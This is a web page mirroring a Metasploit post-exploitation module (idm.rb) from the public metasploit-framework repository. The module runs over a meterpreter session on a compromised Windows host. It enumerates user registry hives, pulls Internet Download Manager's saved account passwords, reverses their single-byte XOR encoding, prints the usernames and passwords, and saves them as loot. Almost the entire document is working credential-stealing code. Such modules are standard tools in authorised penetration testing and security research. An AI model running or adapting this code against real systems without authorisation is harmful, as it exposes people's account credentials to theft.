CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/idm.rb
Views: 11704
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::Windows::Registry

8
  include Msf::Auxiliary::Report

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Windows Gather Internet Download Manager (IDM) Password Extractor',

15
        'Description' => %q{

16
          This module recovers the saved premium download account passwords from

17
          Internet Download Manager (IDM). These passwords are stored in an encoded

18
          format in the registry. This module traverses through these registry entries

19
          and decodes them. Thanks to the template code of theLightCosine's CoreFTP

20
          password module.

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => [

24
          'sil3ntdre4m <sil3ntdre4m[at]gmail.com>',

25
          'Unknown', # SecurityXploded Team, www.SecurityXploded.com

26
        ],

27
        'Platform' => [ 'win' ],

28
        'SessionTypes' => [ 'meterpreter' ]

29
      )

30
    )

31
  end

32


33
  def run

34
    creds = Rex::Text::Table.new(

35
      'Header' => 'Internet Downloader Manager Credentials',

36
      'Indent' => 1,

37
      'Columns' =>

38
      [

39
        'User',

40
        'Password',

41
        'Site'

42
      ]

43
    )

44


45
    registry_enumkeys('HKU').each do |k|

46
      next unless k.include? 'S-1-5-21'

47
      next if k.include? '_Classes'

48


49
      print_status("Looking at Key #{k}")

50


51
      begin

52
        subkeys = registry_enumkeys("HKU\\#{k}\\Software\\DownloadManager\\Passwords\\")

53
        if subkeys.nil? || subkeys.empty?

54
          print_status('IDM not installed for this user.')

55
          return

56
        end

57


58
        subkeys.each do |site|

59
          user = registry_getvaldata("HKU\\#{k}\\Software\\DownloadManager\\Passwords\\#{site}", 'User')

60
          epass = registry_getvaldata("HKU\\#{k}\\Software\\DownloadManager\\Passwords\\#{site}", 'EncPassword')

61
          next if epass.nil? || (epass == '')

62


63
          pass = xor(epass)

64
          print_good("Site: #{site} (User=#{user}, Password=#{pass})")

65
          creds << [user, pass, site]

66
        end

67


68
        print_status('Storing data...')

69
        path = store_loot(

70
          'idm.user.creds',

71
          'text/csv',

72
          session,

73
          creds.to_csv,

74
          'idm_user_creds.csv',

75
          'Internet Download Manager User Credentials'

76
        )

77
        print_good("IDM user credentials saved in: #{path}")

78
      rescue ::Exception => e

79
        print_error("An error has occurred: #{e}")

80
      end

81
    end

82
  end

83


84
  def xor(ciphertext)

85
    pass = ciphertext.unpack('C*')

86
    key = 15

87
    for i in 0..pass.length - 1 do

88
      pass[i] ^= key

89
    end

90
    return pass.pack('C*')

91
  end

92
end

93


94